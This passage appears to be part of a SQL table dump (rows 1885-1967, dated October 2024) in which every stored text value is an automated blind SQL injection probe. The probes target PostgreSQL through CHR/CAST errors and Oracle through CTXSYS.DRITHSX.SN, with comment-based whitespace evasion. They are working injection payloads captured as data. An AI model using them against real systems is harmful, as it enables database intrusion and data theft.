(1885, 1, 1, 'fJTD\')/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(6368=1340)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(120)||CHR(114)||CHR(102)||CHR(101))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/(\'hCvO\'/**/LIKE/**/\'hCvO', 6, '2024-10-24 19:32:20'),
(1886, 1, 1, 'fJTD\')/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(6368=1340)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(120)||CHR(114)||CHR(102)||CHR(101))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/(\'hCvO\'/**/LIKE/**/\'hCvO', 6, '2024-10-24 19:32:22'),
(1887, 1, 1, 'fJTD\')/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891=9891)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/(\'tMRx\'/**/LIKE/**/\'tMRx', 3, '2024-10-24 19:32:23'),
(1888, 1, 1, 'fJTD\')/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891=9891)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/(\'tMRx\'/**/LIKE/**/\'tMRx', 3, '2024-10-24 19:32:25'),
(1889, 1, 1, 'fJTD%\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(8494=6429)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(75)||CHR(74)||CHR(81)||CHR(117))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/\'FnVo%\'=\'FnVo', 3, '2024-10-24 19:32:26'),
(1890, 1, 1, 'fJTD%\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(8494=6429)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(75)||CHR(74)||CHR(81)||CHR(117))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/\'FnVo%\'=\'FnVo', 3, '2024-10-24 19:32:27'),
(1891, 1, 1, 'fJTD%\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891=9891)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/\'AtXb%\'=\'AtXb', 3, '2024-10-24 19:32:29'),
(1892, 1, 1, 'fJTD%\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891=9891)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/\'AtXb%\'=\'AtXb', 3, '2024-10-24 19:32:30'),
(1893, 1, 1, 'fJTD\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(1016=8035)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(102)||CHR(79)||CHR(85)||CHR(71))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/\'eMiW\'/**/LIKE/**/\'eMiW', 6, '2024-10-24 19:32:32'),
(1894, 1, 1, 'fJTD\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(1016=8035)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(102)||CHR(79)||CHR(85)||CHR(71))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/\'eMiW\'/**/LIKE/**/\'eMiW', 6, '2024-10-24 19:32:34'),
(1895, 1, 1, 'fJTD\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891=9891)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/\'uEGQ\'/**/LIKE/**/\'uEGQ', 3, '2024-10-24 19:32:35'),
(1896, 1, 1, 'fJTD\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891=9891)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/\'uEGQ\'/**/LIKE/**/\'uEGQ', 3, '2024-10-24 19:32:38'),
(1897, 1, 1, 'fJTD\")/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4321=5360)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(84)||CHR(79)||CHR(69)||CHR(68))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/(\"nggS\"=\"nggS', 3, '2024-10-24 19:32:39'),
(1898, 1, 1, 'fJTD\")/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4321=5360)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(84)||CHR(79)||CHR(69)||CHR(68))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/(\"nggS\"=\"nggS', 3, '2024-10-24 19:32:41'),
(1899, 1, 1, 'fJTD\")/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891=9891)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/(\"Ppqu\"=\"Ppqu', 3, '2024-10-24 19:32:42'),
(1900, 1, 1, 'fJTD\")/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891=9891)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/(\"Ppqu\"=\"Ppqu', 3, '2024-10-24 19:32:43'),
(1901, 1, 1, 'fJTD\"/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4615=1942)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(122)||CHR(79)||CHR(114)||CHR(106))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/\"OQvc\"=\"OQvc', 3, '2024-10-24 19:32:44'),
(1902, 1, 1, 'fJTD\"/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4615=1942)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(122)||CHR(79)||CHR(114)||CHR(106))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/\"OQvc\"=\"OQvc', 3, '2024-10-24 19:32:45'),
(1903, 1, 1, 'fJTD\"/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891=9891)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/\"IeGS\"=\"IeGS', 3, '2024-10-24 19:32:46'),
(1904, 1, 1, 'fJTD\"/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891=9891)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/\"IeGS\"=\"IeGS', 3, '2024-10-24 19:32:48'),
(1905, 1, 1, 'fJTD)/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9756=3076)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(78)||CHR(67)||CHR(87)||CHR(115))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/(3134/**/BETWEEN/**/3134/**/AND/**/3134', 3, '2024-10-24 19:32:49'),
(1906, 1, 1, 'fJTD)/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9756=3076)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(78)||CHR(67)||CHR(87)||CHR(115))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/(3134/**/BETWEEN/**/3134/**/AND/**/3134', 3, '2024-10-24 19:32:50'),
(1907, 1, 1, 'fJTD)/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891=9891)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/(4957/**/BETWEEN/**/4957/**/AND/**/4957', 3, '2024-10-24 19:32:51'),
(1908, 1, 1, 'fJTD)/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891=9891)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/(4957/**/BETWEEN/**/4957/**/AND/**/4957', 3, '2024-10-24 19:32:52'),
(1909, 1, 1, 'fJTD))/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(3395=8041)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(98)||CHR(114)||CHR(82)||CHR(80))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/((8217/**/BETWEEN/**/8217/**/AND/**/8217', 3, '2024-10-24 19:32:53'),
(1910, 1, 1, 'fJTD))/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(3395=8041)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(98)||CHR(114)||CHR(82)||CHR(80))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/((8217/**/BETWEEN/**/8217/**/AND/**/8217', 3, '2024-10-24 19:32:54'),
(1911, 1, 1, 'fJTD))/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891=9891)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/((1336/**/BETWEEN/**/1336/**/AND/**/1336', 3, '2024-10-24 19:32:56'),
(1912, 1, 1, 'fJTD))/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891=9891)/**/THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL/**/AND/**/((1336/**/BETWEEN/**/1336/**/AND/**/1336', 3, '2024-10-24 19:32:58'),
(1913, 1, 1, 'fJTD/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(2429/**/BETWEEN/**/6804)/**/AND/**/6804)THEN/**/NULL/**/ELSE/**/CAST((CHR(113)||CHR(74)||CHR(88)||CHR(69))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL', 3, '2024-10-24 19:32:59'),
(1914, 1, 1, 'fJTD/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(2429/**/BETWEEN/**/6804)/**/AND/**/6804)THEN/**/NULL/**/ELSE/**/CAST((CHR(113)||CHR(74)||CHR(88)||CHR(69))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL', 3, '2024-10-24 19:33:00'),
(1915, 1, 1, 'fJTD/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891/**/BETWEEN/**/9891)/**/AND/**/9891)THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL', 3, '2024-10-24 19:33:01'),
(1916, 1, 1, 'fJTD/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891/**/BETWEEN/**/9891)/**/AND/**/9891)THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL', 3, '2024-10-24 19:33:02'),
(1917, 1, 1, 'fJTD/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(5473/**/BETWEEN/**/5493)/**/AND/**/5493)THEN/**/NULL/**/ELSE/**/CAST((CHR(108)||CHR(115)||CHR(82)||CHR(89))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL--/**/YgUB', 3, '2024-10-24 19:33:04'),
(1918, 1, 1, 'fJTD/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(5473/**/BETWEEN/**/5493)/**/AND/**/5493)THEN/**/NULL/**/ELSE/**/CAST((CHR(108)||CHR(115)||CHR(82)||CHR(89))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL--/**/YgUB', 3, '2024-10-24 19:33:05'),
(1919, 1, 1, 'fJTD/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891/**/BETWEEN/**/9891)/**/AND/**/9891)THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL--/**/YDid', 3, '2024-10-24 19:33:06'),
(1920, 1, 1, 'fJTD/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9891/**/BETWEEN/**/9891)/**/AND/**/9891)THEN/**/NULL/**/ELSE/**/CAST((CHR(107)||CHR(120)||CHR(108)||CHR(87))/**/AS/**/NUMERIC)/**/END))/**/IS/**/NULL--/**/YDid', 3, '2024-10-24 19:33:08'),
(1921, 1, 1, 'fJTD\')/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(2086=4181)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,2086)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/(\'SoRh\'=\'SoRh', 1, '2024-10-24 19:33:10'),
(1922, 1, 1, 'fJTD\')/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(2086=4181)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,2086)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/(\'SoRh\'=\'SoRh', 1, '2024-10-24 19:33:11'),
(1923, 1, 1, 'fJTD\')/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706=4706)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/(\'NrMO\'=\'NrMO', 1, '2024-10-24 19:33:12'),
(1924, 1, 1, 'fJTD\')/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706=4706)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/(\'NrMO\'=\'NrMO', 1, '2024-10-24 19:33:13'),
(1925, 1, 1, 'fJTD\'))/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4480=6811)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4480)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/((\'YpAn\'=\'YpAn', 1, '2024-10-24 19:33:14'),
(1926, 1, 1, 'fJTD\'))/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4480=6811)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4480)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/((\'YpAn\'=\'YpAn', 1, '2024-10-24 19:33:16'),
(1927, 1, 1, 'fJTD\'))/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706=4706)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/((\'cJVy\'=\'cJVy', 1, '2024-10-24 19:33:17'),
(1928, 1, 1, 'fJTD\'))/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706=4706)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/((\'cJVy\'=\'cJVy', 1, '2024-10-24 19:33:18'),
(1929, 1, 1, 'fJTD\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4017=5502)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4017)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/\'AMev\'=\'AMev', 1, '2024-10-24 19:33:19'),
(1930, 1, 1, 'fJTD\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4017=5502)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4017)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/\'AMev\'=\'AMev', 1, '2024-10-24 19:33:21'),
(1931, 1, 1, 'fJTD\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706=4706)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/\'YQsf\'=\'YQsf', 1, '2024-10-24 19:33:22'),
(1932, 1, 1, 'fJTD\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706=4706)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/\'YQsf\'=\'YQsf', 1, '2024-10-24 19:33:23'),
(1933, 1, 1, 'fJTD\')/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(3891=3385)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,3891)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/(\'BAHU\'/**/LIKE/**/\'BAHU', 1, '2024-10-24 19:33:24'),
(1934, 1, 1, 'fJTD\')/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(3891=3385)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,3891)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/(\'BAHU\'/**/LIKE/**/\'BAHU', 1, '2024-10-24 19:33:25'),
(1935, 1, 1, 'fJTD\')/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706=4706)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/(\'AYXk\'/**/LIKE/**/\'AYXk', 1, '2024-10-24 19:33:27'),
(1936, 1, 1, 'fJTD\')/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706=4706)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/(\'AYXk\'/**/LIKE/**/\'AYXk', 1, '2024-10-24 19:33:29'),
(1937, 1, 1, 'fJTD%\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(7020=7846)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,7020)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/\'kLmP%\'=\'kLmP', 1, '2024-10-24 19:33:30'),
(1938, 1, 1, 'fJTD%\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(7020=7846)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,7020)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/\'kLmP%\'=\'kLmP', 1, '2024-10-24 19:33:32'),
(1939, 1, 1, 'fJTD%\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706=4706)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/\'wwBG%\'=\'wwBG', 1, '2024-10-24 19:33:33'),
(1940, 1, 1, 'fJTD%\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706=4706)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/\'wwBG%\'=\'wwBG', 1, '2024-10-24 19:33:34'),
(1941, 1, 1, 'fJTD\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4438=6967)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4438)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/\'rxOa\'/**/LIKE/**/\'rxOa', 1, '2024-10-24 19:33:35'),
(1942, 1, 1, 'fJTD\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4438=6967)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4438)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/\'rxOa\'/**/LIKE/**/\'rxOa', 1, '2024-10-24 19:33:36'),
(1943, 1, 1, 'fJTD\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706=4706)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/\'pumU\'/**/LIKE/**/\'pumU', 1, '2024-10-24 19:33:37'),
(1944, 1, 1, 'fJTD\'/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706=4706)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/\'pumU\'/**/LIKE/**/\'pumU', 1, '2024-10-24 19:33:38'),
(1945, 1, 1, 'fJTD\")/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(5815=9920)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,5815)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/(\"DdDG\"=\"DdDG', 1, '2024-10-24 19:33:40'),
(1946, 1, 1, 'fJTD\")/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(5815=9920)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,5815)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/(\"DdDG\"=\"DdDG', 1, '2024-10-24 19:33:41'),
(1947, 1, 1, 'fJTD\")/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706=4706)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/(\"iQYt\"=\"iQYt', 1, '2024-10-24 19:33:42'),
(1948, 1, 1, 'fJTD\")/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706=4706)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/(\"iQYt\"=\"iQYt', 1, '2024-10-24 19:33:44'),
(1949, 1, 1, 'fJTD\"/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9661=1581)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,9661)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/\"MBnI\"=\"MBnI', 1, '2024-10-24 19:33:45'),
(1950, 1, 1, 'fJTD\"/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9661=1581)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,9661)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/\"MBnI\"=\"MBnI', 1, '2024-10-24 19:33:46'),
(1951, 1, 1, 'fJTD\"/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706=4706)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/\"JOVa\"=\"JOVa', 1, '2024-10-24 19:33:47'),
(1952, 1, 1, 'fJTD\"/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706=4706)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/\"JOVa\"=\"JOVa', 1, '2024-10-24 19:33:48'),
(1953, 1, 1, 'fJTD)/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(7220=6262)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,7220)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/(9908/**/BETWEEN/**/9908/**/AND/**/9908', 1, '2024-10-24 19:33:49'),
(1954, 1, 1, 'fJTD)/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(7220=6262)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,7220)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/(9908/**/BETWEEN/**/9908/**/AND/**/9908', 1, '2024-10-24 19:33:50'),
(1955, 1, 1, 'fJTD)/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706=4706)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/(3340/**/BETWEEN/**/3340/**/AND/**/3340', 1, '2024-10-24 19:33:51'),
(1956, 1, 1, 'fJTD)/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706=4706)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/(3340/**/BETWEEN/**/3340/**/AND/**/3340', 1, '2024-10-24 19:33:53'),
(1957, 1, 1, 'fJTD))/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(8876=7645)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,8876)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/((3095/**/BETWEEN/**/3095/**/AND/**/3095', 1, '2024-10-24 19:33:54'),
(1958, 1, 1, 'fJTD))/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(8876=7645)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,8876)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/((3095/**/BETWEEN/**/3095/**/AND/**/3095', 1, '2024-10-24 19:33:55'),
(1959, 1, 1, 'fJTD))/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706=4706)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/((7706/**/BETWEEN/**/7706/**/AND/**/7706', 1, '2024-10-24 19:33:56'),
(1960, 1, 1, 'fJTD))/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706=4706)/**/THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL/**/AND/**/((7706/**/BETWEEN/**/7706/**/AND/**/7706', 1, '2024-10-24 19:33:58'),
(1961, 1, 1, 'fJTD/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9666/**/BETWEEN/**/5782)/**/AND/**/5782)THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,9666)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL', 1, '2024-10-24 19:33:59'),
(1962, 1, 1, 'fJTD/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(9666/**/BETWEEN/**/5782)/**/AND/**/5782)THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,9666)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL', 1, '2024-10-24 19:34:01'),
(1963, 1, 1, 'fJTD/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706/**/BETWEEN/**/4706)/**/AND/**/4706)THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL', 1, '2024-10-24 19:34:02'),
(1964, 1, 1, 'fJTD/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706/**/BETWEEN/**/4706)/**/AND/**/4706)THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL', 1, '2024-10-24 19:34:04'),
(1965, 1, 1, 'fJTD/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4738/**/BETWEEN/**/3353)/**/AND/**/3353)THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4738)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL--/**/HfcH', 1, '2024-10-24 19:34:05'),
(1966, 1, 1, 'fJTD/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4738/**/BETWEEN/**/3353)/**/AND/**/3353)THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4738)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL--/**/HfcH', 1, '2024-10-24 19:34:06'),
(1967, 1, 1, 'fJTD/**/AND/**/(SELECT/**/(CASE/**/WHEN/**/(4706/**/BETWEEN/**/4706)/**/AND/**/4706)THEN/**/NULL/**/ELSE/**/CTXSYS.DRITHSX.SN(1,4706)/**/END)/**/FROM/**/DUAL)/**/IS/**/NULL--/**/Jzic', 1, '2024-10-24 19:34:08'),
